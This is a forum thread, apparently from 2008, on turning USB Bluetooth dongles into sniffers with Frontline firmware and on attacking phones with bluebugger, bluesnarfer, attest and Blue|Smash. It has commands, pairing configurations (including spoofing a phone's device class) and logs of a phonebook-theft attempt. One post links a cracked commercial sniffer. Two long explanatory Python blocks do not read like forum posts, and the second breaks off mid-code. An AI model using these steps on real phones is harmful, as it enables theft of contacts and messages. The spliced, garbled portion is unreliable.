hciconfig hci0 revision
hci0: Type: USB
BD Address: 00:1C:F0:6C:AC:D4 ACL MTU: 1017:8 SCO MTU: 64:0
Firmware 61.67 / 14

So I don't really understand what that means, I don't see EXT or ROM chipset. I will post more info about my device here.

hciconfig -a
hci0: Type: USB
BD Address: 00:1C:F0:6C:AC:D4 ACL MTU: 1017:8 SCO MTU: 64:0
UP RUNNING
RX bytes:398 acl:0 sco:0 events:14 errors:0
TX bytes:48 acl:0 sco:0 commands:14 errors:0
Features: 0xff 0xff 0x8d 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'BCM2045B3'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 2.0 (0x3) HCI Rev: 0x403d LMP Ver: 2.0 (0x3) LMP Subver: 0x430e
Manufacturer: Broadcom Corporation (15)

once I try to run the command to back up the firmware I get this
dfutool -d hci0 archive backolddlink.dfu
Available devices with DFU support:

1) Bus 3 Device 4: ID 07d1:f101 Interface 3

Select device (abort with 0): 1

Can't identify device with DFU mode

even when I try to run any of the BCCMD commands I still get this message

bccmd psget -s 0x0000 0x02bf
Unsupported manufacturer

I was trying to find the Frontline ComProbe pack firmware you used in the video, drgr33n, but haven't found it around yet... do you have a link or something by any chance?


... I'm running a BT3beta Live USB install with saved changes on a Toshiba Satellite A-100.
The help will be really appreciated, folks... as these are my first steps inside the world of Bluetooth...

imported_=Tron=
06-24-2008, 03:38 PM
I was trying to find the Frontline ComProbe pack firmware you used in the video, drgr33n, but haven't found it around yet... do you have a link or something by any chance?

The only way to legally obtain a copy of the firmware is to actually buy the frontline comprobe. As with every expensive software there are pirated versions of it available on the interweb, but even linking to these could be considered illegal.

daleapearson
06-25-2008, 04:34 PM
Guys,

Can any of you guys advise on what method needs to be used to send a text message via bluesnarfer or bluebugger?

I assume this is done via an AT command, but any information you guys could share would be much appreciated.

Thanks in advance.
Dale

akamagic
06-26-2008, 06:21 AM
OK, someone correct me if I'm wrong, but basically every phone can be either non-vulnerable, or vulnerable to selected types of attacks, i.e. bluesnarfer, HeloMoto, bluesmack etc. This is also based on the types of profiles (i.e. Object Push profile etc.) a phone has. So generally speaking the odds of getting into any given phone and being able, for example, to see their contacts are very low no matter what firmware a dongle has? Just wondering, since I wanted to know if this was worth the hassle of getting an EXT dongle, or if it even makes a difference with my current ROM dongle.
any feedback is appreciated

DARTIS
06-27-2008, 09:32 AM
My first post here and the reason I logged in was to say the following:

I kindly thank DR_GREEN for the effort to try to help us all with specialised matters on Bluetooth (he forced me to look into this matter) but from my experience in this, what he has managed is to disorient every reader of this forum.

There are lots of threads and places around the internet to find this information and the only thing that is done here is to summarise them all with many, many mistakes and wrong things.

There is nowhere explained how exactly he did manage to make this work, but he has given some information on many unconnected things which in the end do not make sense.

In his example of the Frontline modding of a dongle he does not mention that the correct firmware has to be found and installed too. In the first post here he just uses dfutool and shouts that this is all that is needed...
Many posts follow with questions with no answer.

Secondly there is no need to complicate things with the mknod files, because you can fix whatever rfcomm file you want and then give it the service... why complicate channels 3,5,7,.....10 and whatever when you can simply add 3 rfcomm devices 1,2,3, then give them respectively a service and channel.

For example:
mknod -m 666 /dev/rfcomm1 c 216 1
mknod -m 666 /dev/rfcomm2 c 216 2
mknod -m 666 /dev/rfcomm3 c 216 3

sdptool add --channel=1 DUN
sdptool add --channel=2 OPUSH
sdptool add --channel=3 FTP

rfcomm bind 1 [….MAC] 3
rfcomm bind 2 [….MAC] 6
rfcomm bind 3 [….MAC] 7


Afterwards you connect/bind with rfcomm the device 1 with the respective channel of the phone which has the same service... this shows some lack of knowledge.

A lot could be said.

The famous video which is showing how the work is done connects to the MAC of the sniffer and not of a phone... you hack with the sniffer but it is not shown how all this is prepared in the first place.

The blue|smash 2.0 application is completely broken and not ready to be on BackTrack 3.
I modded it just to begin (it does not work at all!) and then later the db files are all messed up. I have given up because I lacked the time.

It should not have been inserted if not ready.

The Blue|Smash 1.0 was better and worked OK but it cannot hack anything unless there is proper information on what to do exactly.

There is the software "BlueDiving" which is written in Perl and I recommend everybody look at it... I fear there is a conflict between BlueSmash and BlueDiving because they do the same thing, only to find out that the Perl is antagonizing a Python script... who wrote it first I am unsure.

I am sorry for the harsh words. I believe this thread needs a lot more contribution and it is obvious that a lot of readers are discouraged due to lack of proper information. I will try to create a proper tutorial when I manage to do so.

PS. I have the experience of having an Internet modding work with hundreds of thousands of downloads (later I may reveal myself). I believe in proper information and the proper handling of its readers.

So for the sake of this community, we have to give a proper tutorial in this matter and not XXXXX.

akamagic
06-27-2008, 06:33 PM
Well, you seem to make sense, since the whole Bluetooth coverage really isn't "proper" and is introduced here so much; although you do come off a little harsh, since Dr Green has done a great amount of contribution to this matter and is willing to help those who need help. But yes, I do agree there should be revisions to make a more "complete" tutorial. I admit I was a little discouraged since I had so many questions about this matter, but then again questions lead to interest (for me at least), so I have done a good amount of research in the past few days but still have questions, so your tutorial would be more than welcome.

PS: you mentioned there were "lots" of threads on this; however, I really don't believe this is true. But there is a guide on how to upgrade your firmware which comes with the Frontline ComProbe pack (even though it doesn't mention you need a compatible EXT dongle, but that's beside the point). But my point is we do need a tutorial where Bluetooth is covered in good detail all in one thread/site, which was the concept of Dr Green's tutorial. But again more does need to be added, and don't get me wrong, it's obvious Dr Green has a vast amount of knowledge in Bluetooth, but writing a "complete" tutorial isn't the easiest thing to do.

DARTIS
06-27-2008, 06:51 PM
@akamagic:

Yes... I am a bit harsh. I did not want to sound unthankful but I managed to do so...

Indeed, he has contributed a lot as I can trace.
But still I believe that at the time he wrote these lines he was more enthusiastic than knowledgeable.

Bluetooth hacking cannot be done in Bluetooth 2.0 without a sniffer... forget about it.

Sniffer creation tutorial...

A lot better is the one here:
nfodb.com/view_231041_Frontline-Bluetooth-Sniffer-v5.6.9.0-Cracked-.html

-EDIT-

Add h t t p : / / to the above link... I am a new poster and they do not let me post links yet... so I torrented them :)

akamagic
06-29-2008, 12:25 AM
@ DARTIS

Lol, yeah, that's the guide I was talking about that comes with the Frontline ComProbe pack, but even with that tut it is easy to run into problems, and even if we finally have a sniffer, then what (i.e. where do we get started into actually hacking)... which is what I meant by a complete Bluetooth hacking tutorial with FAQs, which would solve a lot of problems/confusion and lead to more success. But yeah, thanks for the link, even though everyone still needs the .dfu firmware unless they have it already, which would mean they have that tut already.

DARTIS
06-29-2008, 02:45 PM
@akamagic

I have also seen a lot of people having problems issuing a simple handshake between their laptop and cellphones.

I will write a few comments to help before a total tutorial


1st Step
Go to
/etc/bluetooth/passkeys/default
Put 0000 or 1234 in there as the PIN of your laptop

Make it executable


2nd Step
Go to
/etc/bluetooth/hcid.conf

Change the following:


#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto; #or else the authentication will not work

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi; #or else the authentication will not work

# Default PIN code for incoming connections
passkey "0000"; #or 1234, ...=The PIN which is given to the cellphone ...if we are lucky!
} # the options block must be closed before the device block, or hcid rejects the file

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "DARTIS or YOUR name :)";
# Local device class
class 0x000240; #Disguise your laptop as a simple cellphone. Put the exact class of the cellphone you want to connect to for maybe better results... learn it by hcitool inq

# Default packet type
#pkt_type DH1,DM1,HV1;
pkt_type DH1,DM1,HV1; #Optional

# Inquiry and Page scan
#iscan enable;
pscan enable;
iscan enable; #(Important for better communication between BTs)

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master; #Very important for the sniffer business..

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park; #rswitch can be disabled if you use master mode

auth enable; #Very important for the pairing process
encrypt enable; #Very important for the sniffing process
}

Make it executable


3rd Step

Fire up your HCIs separately

hciconfig hci0 up
hciconfig hci1 up
etc...


4th Step

Put in your console the command

bash /etc/rc.d/rc.bluetooth restart

Check = OK with hciconfig -a
You should be able to proceed ...

Will revert with more

@those who had problems pairing
I would appreciate the feedback for anymore of your problems in that matter.

akamagic
06-29-2008, 10:45 PM
That's basically my procedure to get them paired, but a nice start; although I don't understand what the purpose is of making the passkey or .conf file executable?

imported_ASTRAPI
07-02-2008, 05:37 PM
Hi

I started with the first post and most of it was working great until the phone asks for a key to pair and never pairs, so I can't get any info from the phone.

So I followed the steps to add raw mode to my Fujitsu Siemens V2.0 Bluetooth and it was all OK according to post #2 and I verified all codes.

Then i use:
hciconfig hci0 up (all ok)
hciconfig -a (i get this info)

BD address: bla bla
up running RAW
rx bla bla
tx bla bla

And nothing else (before I had more info there).

then I use:
hcitool scan hci0

I get this:

Device is not available: No such device

also my Bluetooth info:
hciconfig hci* revision

Bd address bla bla
hci 19.2
chip version: bluecore4 External
max key size: 56bit
sco mapping HCI

Any help please?

Thanks

akamagic
07-02-2008, 09:23 PM
Hi

I started with the first post and most of it was working great until the phone asks for a key to pair and never pairs, so I can't get any info from the phone.

So I followed the steps to add raw mode to my Fujitsu Siemens V2.0 Bluetooth and it was all OK according to post #2 and I verified all codes.

Then i use:
hciconfig hci0 up (all ok)
hciconfig -a (i get this info)

BD address: bla bla
up running RAW
rx bla bla
tx bla bla

And nothing else (before I had more info there).

then I use:
hcitool scan hci0

I get this:

Device is not available: No such device

also my Bluetooth info:
hciconfig hci* revision

Bd address bla bla
hci 19.2
chip version: bluecore4 External
max key size: 56bit
sco mapping HCI

Any help please?

Thanks

I'm assuming you didn't upgrade using the *.dfu file which is contained in the frontline comprobe pack. (look at drgreen's vid.)

imported_ASTRAPI
07-03-2008, 06:51 AM
I did it but I have the same result :(

As you can see in the video Raw mode is good and is what we want, but after that I can't scan using:


hcitool scan hci0

So I can't find any devices to try all the rest of the commands.

ColForbin
07-06-2008, 09:56 PM
"what he has managed is to disorient every reader of this forum."

Apologies DARTIS, but I beg to differ sir. I believe that if anyone has been disoriented, it would be the non-readers. Non-readers, being those who want the quick and the easy.

Dr_GrEeN has been nothing but helpful in my experience. If one were to read his posts and follow them explicitly, one would find success.

I followed Dr_GrEen's tutorial on how to modify a USB bluetooth adapter into a sniffing tool, and succeeded on the first try.

The key to success? Reading. I first wanted to know what adapter would work. After searching through the forums, I found that the adapter I wanted to try was a D-Link DBT-120 rev. C.

I bought two and modified one. This is not a rip on DARTIS. This is simply a call to all, to read. Read the entire forum. If you can't find the answer to a question, register and ask.

Furthermore, this a shout out to Dr_GrEeN. The man codes blue-smash, creates detailed tutorials and videos, and is getting it all straight as he goes. Give the man some credit, why don'tcha.

akamagic
07-07-2008, 01:49 PM
I did it but I have the same result :(

As you can see in the video Raw mode is good and is what we want, but after that I can't scan using:



So I can't find any devices to try all the rest of the commands.

Well, that is because now you have a working sniffer, and in the video of cracking the PIN number for a Bluetooth-compatible phone drgreen uses two Bluetooth dongles (one sniffer, and one unmodified one for scanning); but I could be wrong, as I have much more to learn, but most likely you basically need another dongle for scanning.

jrm7262
07-09-2008, 08:06 AM
Have read all the posts, great information, thank you all.

Just wanted to subscribe to the thread.

One question, to actually implement any of the exploits are two
dongles needed?

Also looking at all the links the one dongle that seems the most probable is the D-Link DBT-120 Rev C1 (Now when I find a supply, do I buy 1 or 2, lol)

Kindest regards

James

DARTIS
07-09-2008, 01:13 PM
@akamagic
The executable as I remember is important for the default file or else there are pairing problems.
To be sure make them executable.

Can anyone confirm this?

@ASTRAPI:

You cannot pair a sniffer.
You cannot sniff without the firmware. The first post describes how to change the hardware but not how to upgrade the firmware which if you have done it whatsoever you should be able to be in RAW mode as I see.

@ColForbin

You are more than right. In fact I stated in previous post that I managed to be harsh without having this intention. I got in this subject by reading the posts of DrGreen and he is more than helpful as you say.

I know by my own experience that the lack of time makes difficult to update and share information promptly and 100% correctly. And obviously this is the case here.

Although it is summer I will try to contribute more in this subject or else... from September.
I bet DrGreen will produce something in the meantime. Or else someone else or even me will catch him up.

In any case... the forum needs contribution and I hope it will be shared.

akamagic
07-09-2008, 02:11 PM
@DARTIS

I don't believe it is necessary to make them executable as for me it works either way, but guess it wouldn't hurt

@jrm7262

Its really up to you since you could still scan phones and use simple attacks such as bluebugger and bluesnarfer (depending on the phone) with one unmodified dongle. But of course it would be better to have two dongles. One as a sniffer (in raw mode) and the other unmodified (for scanning and such) as being able to sniff is where the exploits really begin.

ps: The DBT-120 is what i use as my sniffer and i have another cheap dongle for scanning and pairing

drgr33n
07-10-2008, 03:24 AM
aggtrfrad / sws2007

Can you send me all the info in a PM please, with all the output messages from bccmd etc.

akamagic

Once a dongle has been modified it cannot perform scan tasks ETC because the source code you are using do not contain the right op codes and haven't been coded in Not yet ;)

johnjohnsp1

dbt-122 has a broadcom chipset and doesn't work

daleapearson

Yes you are on the right path, I have alot to catch up on so if you are stuck, post back and I will help out more.

ASTRAPI

Again once a dongle has been modified it cannot perform scan tasks ETC because the source code you are using do not contain the right op codes and haven't been coded in.

DARTIS

Harsh words man ! There are a hundred ways to skin a cat !!!!!!!! For EG:


For example:
mknod -m 666 /dev/rfcomm1 c 216 1
mknod -m 666 /dev/rfcomm2 c 216 2
mknod -m 666 /dev/rfcomm3 c 216 3

sdptool add --channel=1 DUN
sdptool add --channel=2 OPUSH
sdptool add --channel=3 FTP

rfcomm bind 1 [….MAC] 3
rfcomm bind 2 [….MAC] 6
rfcomm bind 3 [….MAC] 7


Afterwards you connect/bind with rfcomm the device 1 with the respective channel of the phone which has the same service... this shows some lack of knowledge.

Why not use mknod ?

Blue|Smash v2.0 was a mix-up that I'm looking into. It IS 100% functional! If I've missed anybody or anything out, post again, as I'm back for a while now ;) As for the people asking for the Frontline firmware, can I just point out that it is illegal to obtain a copy without buying it! I am not prepared to offer any assistance in getting a copy.

jrm7262
07-13-2008, 12:27 PM
Hi All,

When upgrading the firmware of the usb bluetooth dongle (in my case D-Link DBT 120), does it matter which version to upgrade with?

I read through a lot of posts and versions are mentioned from 47 to 52.
(There was one comment that version 5 bricks the dongle).

Any advice appreciated, I'd like not to brick the dongle on my first attempt, just because I used the wrong version of the firmware.


Kindest regards

James

DARTIS
07-14-2008, 04:04 PM
@Dr_GrEeN:

God...sorry. I know I was but it was an explosion of thoughts not really deserving to be used all together against you.


Why not use mknod ?

hmmm...sorry cannot understand.
I just state a more straightforward technique for rfcomm bindings

I hope Bluesmash 2.0 will get fully functional because the DB and pygame commands are buggy.

All the other are functional as they seem but cannot work due to the link with the above mentioned bugs.

@jrm7262:

Use only airsnifferdev47bc2.dfu
or 47 if you prefer.

aggtrfrad
07-21-2008, 07:00 PM
- a7eng eb502 uses a BlueCore2-ext chip, not BlueCore4. Frontline has written a couple of firmware files for different devices including BlueCore2/3/4 chips. Frontline firmware files look like this: Airsnifferdev??bc?.dfu
The first two ? are the version of the firmware, the third ? is the chipset version it is intended for.
That means airsnifferdev57bc4 won't work (won't even load) on an a7eng-eb502 dongle using BlueCore2. airsnifferdev??bc2 uploads to the dongle successfully, BUT the dongle fails verification tests, and never comes back to the normal state; it stays in DFU mode (devid is ffff and it only accepts DFU commands, not bccmd commands, and it's not an HCI device anymore).

- When downloading the original firmware from your a7eng-eb502 dongle to your PC, something goes wrong and the firmware file is corrupted. Not sure why, but it is. That means that if you upload the wrong firmware to your dongle, it's not coming back by re-uploading your backup; it's corrupted.
I have tried several versions of firmware for CSR to bring my dongle back from DFU mode, but none worked.

- bccmd works perfectly for this dongle, but with no new firmware, nothing done.

- The only way to bring this dongle back from DFU mode is to upload the factory firmware; that is the only one it will ever accept (I hope I'm wrong, because I spent $80 after reading it can be a sniffer). This file is not available to the public; I got it after begging a developer from a7eng for help and sending all my order information to him.

p.s. I have tried airsnifferdev46/47bc2. If you have older or newer versions (for bc2 always) please PM me. Maybe we are lucky. Also, if anyone's into the DFU protocol, please PM me. I read that there are some security keys between firmware files and CSR chipsets; maybe that's the reason the dongle only accepts the factory firmware.
Here's a bccmd pslist output, for the record...

0x0001 - Bluetooth address (8 bytes)
0x001e - Radio power table (40 bytes)
0x0021 - Default transmit power (2 bytes)
0x002d - Maximum transmit power when peer has no RSSI (2 bytes)
0x015e - DFU encryption VM application public key MSB (64 bytes)
0x015f - DFU encryption VM application public key LSB (64 bytes)
0x0160 - DFU encryption VM application M dash (2 bytes)
0x0161 - DFU encryption VM application public key R2N MSB (64 bytes)
0x0162 - DFU encryption VM application public key R2N LSB (64 bytes)
0x01be - UART Baud rate (2 bytes)
0x01c2 - UART configuration when under VM control (2 bytes)
0x01f6 - Crystal frequency trim (2 bytes)
0x01f9 - Host interface (2 bytes)
0x01fc - Enable host query task? (2 bytes)
0x0209 - TX and RX PIO control (2 bytes)
0x0259 - Module serial number (4 bytes)
0x025a - Module design ID (2 bytes)
0x025c - Module security code (16 bytes)
0x0267 - Module manufactuer data 9 (16 bytes)
0x02b4 - User configuration data 42 (32 bytes)
0x02c2 - USB product string (56 bytes)
0x02c3 - USB serial number string (40 bytes)
0x03cc - HCI traffic routed internally (2 bytes)
0x03cd - Initial device bootmode (2 bytes)
0x04b0 - Unknown (10 bytes)
0x04b8 - Unknown (2 bytes)
0x04b9 - Unknown (2 bytes)
0x04ba - Unknown (2 bytes)
0x04bb - Unknown (2 bytes)
0x04bc - Unknown (2 bytes)
0x6001 - Unknown (128 bytes)
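The firmware-to-chip match is the one check this thread keeps showing people skipping: the a7eng dongle above that stayed in DFU mode after a bc2 image, the DBT-122 that bccmd rejects as an unsupported manufacturer, the Fujitsu Siemens dongle that reports "bluecore4 External". The following is an added example, not code from drgr33n's tutorial, from bluez or from Frontline. It parses the Airsnifferdev??bc?.dfu name (the convention described in the post above) and a `hciconfig hciX revision` listing, and refuses the combination when the BlueCore generation differs, the part is a ROM part, or no CSR chip line is present at all. The two revision listings are constructed samples, not captured from hardware; the "Chip version: BlueCoreN-External" wording is what bluez prints for CSR parts. A pass is necessary, not sufficient: the post above records a BlueCore2-External dongle that accepted a bc2 image and still failed verification.

```python
"""Check a sniffer .dfu file name against the chip a dongle reports before flashing.

Added example for this thread, not part of the tutorial, bluez or Frontline's tools.
Assumptions: file names follow airsnifferdev<ver>bc<N>.dfu, and `hciconfig hciX
revision` prints a "Chip version: BlueCoreN-External" line for CSR parts (Broadcom
parts print a "Firmware" line instead and are not reachable with bccmd/dfutool).
"""
import re

# Constructed sample outputs in the layout of `hciconfig hci0 revision` (not captured).
SAMPLE_REVISION_CSR = """\
hci0:   Type: USB
        BD Address: 00:11:22:33:44:55  ACL MTU: 384:8  SCO MTU: 64:8
        HCI 19.2
        Chip version: BlueCore4-External
        Max key size: 56 bit
        SCO mapping:  HCI
"""

SAMPLE_REVISION_BROADCOM = """\
hci0:   Type: USB
        BD Address: 00:1C:F0:6C:AC:D4  ACL MTU: 1017:8  SCO MTU: 64:0
        Firmware 61.67 / 14
"""

DFU_NAME = re.compile(r"^airsnifferdev(?P<ver>\d+)bc(?P<bc>\d+)\.dfu$", re.IGNORECASE)
CHIP_LINE = re.compile(r"Chip version:\s*BlueCore(?P<bc>\d+)(?:-(?P<mem>[A-Za-z]+))?",
                       re.IGNORECASE)


def parse_dfu_name(path):
    """'airsnifferdev47bc2.dfu' -> (47, 2): firmware build and target BlueCore generation."""
    m = DFU_NAME.match(path.rsplit("/", 1)[-1])
    if not m:
        raise ValueError("not a Frontline-style sniffer firmware name: %r" % path)
    return int(m.group("ver")), int(m.group("bc"))


def parse_chip(revision_output):
    """Return (bluecore_generation, has_external_flash) or None if no BlueCore line exists.

    has_external_flash is True for -External/-Flash parts, False for -ROM parts and
    None when the part name carries no memory suffix (e.g. BlueCore01a).
    """
    m = CHIP_LINE.search(revision_output)
    if not m:
        return None
    mem = (m.group("mem") or "").lower()
    external = True if mem in ("external", "flash") else False if mem == "rom" else None
    return int(m.group("bc")), external


def firmware_check(path, revision_output):
    """Return (ok, reason). ok only when generations match and the part has external flash."""
    ver, want_bc = parse_dfu_name(path)
    chip = parse_chip(revision_output)
    if chip is None:
        return False, "no BlueCore line: not a CSR part, bccmd/dfutool will not talk to it"
    have_bc, external = chip
    if have_bc != want_bc:
        return False, "image targets BlueCore%d but dongle is BlueCore%d" % (want_bc, have_bc)
    if external is False:
        return False, "BlueCore%d-ROM has no external flash to reprogram" % have_bc
    if external is None:
        return False, "cannot tell whether this BlueCore%d part has external flash" % have_bc
    return True, "build %d matches BlueCore%d-External" % (ver, have_bc)


if __name__ == "__main__":
    for name in ("airsnifferdev57bc4.dfu", "airsnifferdev47bc2.dfu"):
        print(name, firmware_check(name, SAMPLE_REVISION_CSR))
    print("DBT-122", firmware_check("airsnifferdev47bc2.dfu", SAMPLE_REVISION_BROADCOM))
```

Run it with the real `hciconfig hciX revision` output piped in place of the sample before `dfutool upgrade`; a False result means the image should not go anywhere near the dongle, and even a True result does not replace the factory backup step.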

BigMac
07-21-2008, 11:55 PM
Dr_Green i wanted to ask you if you tried carwhisperer yet?

I installed it the other night and tested it with my USB dongle, but I don't have a Bluetooth phone or headset... I tested the tools out and it seems very simple...

williamc
07-23-2008, 01:19 PM
Trying out your findings. Here's what I've found and where I'm stuck:

I have three Bluetooth adaptors. One is internal to the laptop (hci0), one is my Dlink sniffer (hci1), and one is my Linksys BT100 (hci2).

hci0: Type: USB
BD Address: 00:1E:37:5A:F4:5B ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING PSCAN
RX bytes:24562 acl:113 sco:0 events:656 errors:0
TX bytes:8863 acl:119 sco:0 commands:289 errors:0

hci1: Type: USB
BD Address: 00:17:9A:2B:86:11 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:186 acl:0 sco:0 events:0 errors:0
TX bytes:129 acl:0 sco:0 commands:18 errors:0

hci2: Type: USB
BD Address: 00:18:F8:89:8F:34 ACL MTU: 377:10 SCO MTU: 64:8
UP RUNNING PSCAN
RX bytes:21417 acl:89 sco:0 events:482 errors:0
TX bytes:7920 acl:95 sco:0 commands:244 errors:0


I followed your original posts to configure the devices. Now, I'm working on your video for sniffing with Bluesmash. I get to this point and appear to have an error:

Enter device name eg hci0.....: hci1
Use Timer ? y/n: y
Use Filter ? y/n: n
Ignore packet type? y/n: n
Ignore zero length packets? y/n: y
Own pin? y/n: y
Scanning for devices.......
Blue|Smash found 00:1C:43:81:27:BC - SGH-A707
Enter the Master's MAC....:00:1E:37:5A:F4:5B
Enter the Slaves's MAC....:00:1C:43:81:27:BC
csr_sniffer: hci_send_req(): Connection timed out
csr_sniffer: hci_send_req(): Connection timed out
Launching Sniffer :p
hcidump's log will be stored in 00:1E:37:5A:F4:5B@00:1C:43:81:27:BC.cap

Continuing on, I get errors:

bt ~ # attest 00:1C:43:81:27:BC 3
Connecting to 00:1C:43:81:27:BC on channel 3
Can't connect: Permission denied (13)

Log file is empty too. Any ideas? Thanks!

William

arisdim
08-19-2008, 06:45 AM
Can someone explain to me why i get "Cannot open '/dev/rfcomm0': Connection refused" message at the end?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: AA:AA:AA:AA:AA:AA ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # sdptool browse 00:11:22:33:44:55
Browsing 00:11:22:33:44:55 ...
Service Description: Sony Ericsson K750
Service RecHandle: 0x10000
Service Class ID List:
"PnP Information" (0x1200)

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
"Dialup Networking" (0x1103)
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2

Service Name: HF Voice Gateway
Service RecHandle: 0x10003
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0101

Service Name: HS Voice Gateway
Service RecHandle: 0x10004
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: OBEX SyncML Client
Service RecHandle: 0x10007
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)

Service Name: OBEX IrMC Sync Server
Service RecHandle: 0x10008
Service Class ID List:
"IrMC Sync" (0x1104)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
"OBEX" (0x0008)
Profile Descriptor List:
"IrMC Sync" (0x1104)
Version: 0x0100

Service Name: Mouse & Keyboard
Service Description: Remote Control
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Human Interface Device" (0x1124)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 17
"HIDP" (0x0011)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Human Interface Device" (0x1124)
Version: 0x0100

bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 1
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 5
bt ~ # sdptool add --channel=1 DUN
bt ~ # sdptool add --channel=6 FTP
bt ~ # sdptool add --channel=5 OPUSH
bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # bluebugger -m as -a 00:11:22:33:44:55 phonebook

bluebugger 0.1 ( MaJoMu | www.codito.de )
-----------------------------------------

Target Device: '00:11:22:33:44:55'
Target Name: 'K750i'

Cannot open '/dev/rfcomm0': Connection refused


I have changed the /etc/bluetooth/hcid.conf with that:

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
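DARTIS's "three rfcomm devices, three services" recipe earlier in the thread and the session above both depend on two details: reading the RFCOMM channel of each service out of `sdptool browse` (the phonebook/OBEX channel differs from phone to phone), and creating /dev/rfcommN with a minor number equal to N. The mknod lines above create /dev/rfcomm0 with minor 1 and /dev/rfcomm1 with minor 6, so the node names no longer match the rfcomm device numbers that `rfcomm bind` and bluebugger refer to. The following is an added example, not code from the tutorial or from bluez: it turns a browse listing into a service-to-channel map, emits mknod and bind commands with consistent minors for the services you pick, and flags mknod lines whose minor does not match the index. The browse excerpt is constructed in the layout of the K750i listing above; it assumes the rfcomm char-device major is 216, as in every mknod line in this thread.

```python
"""Pick RFCOMM channels from `sdptool browse` output and plan matching rfcomm device nodes.

Added example for this thread, not code from the tutorial or from bluez.
Assumptions: rfcomm char-device major 216, and /dev/rfcommN must carry minor N.
"""
import re

RFCOMM_MAJOR = 216

# Constructed excerpt in the layout of `sdptool browse <bdaddr>`, modelled on the K750i
# listing in the thread. Channel numbers differ per phone: always browse the real target.
SAMPLE_BROWSE = """\
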